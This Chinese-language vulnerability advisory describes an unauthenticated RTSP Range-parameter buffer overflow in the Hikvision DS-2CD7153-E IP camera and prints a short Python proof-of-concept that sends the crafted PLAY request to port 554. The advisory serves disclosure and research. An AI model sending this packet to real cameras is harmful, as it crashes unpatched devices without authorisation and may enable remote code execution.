发布日期:-08-06
更新日期:-08-08
受影响系统:
hikvision DS-2CD7153-E IP Camera v4.1.0 b130111
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 61642
CVE(CAN) ID: CVE--4977
Hikvision DS-2CD7153-E是日夜型防水防暴迷你半球网络摄像机。
Hikvision DS-2CD7153-E固件版本4.1.0 b130111在处理RTSP事务的Range参数时,精心构造的报文会触发缓冲区溢出,造成处理通讯的进程崩溃,Watchdog服务重启。无需身份验证即可利用此漏洞,也有可能导致远程代码执行。
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
import socket
HOST = 'X.X.X.X'
PORT = 554
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
trigger_pkt = "PLAY rtsp://%s/ RTSP/1.0\r\n" % HOST
trigger_pkt += "CSeq: 7\r\n"
trigger_pkt += "Range: npt=Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9aLSaLSaLS\r\n"
trigger_pkt += "User-Agent: VLC media player (LIVE555 Streaming Media v.02.10)\r\n\r\n"
s.sendall(trigger_pkt)
print "Packet sent"
data = s.recv(1024)
print 'Received', repr(data), "\r\n"
s.close()
建议:
--------------------------------------------------------------------------------
厂商补丁:
hikvision
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
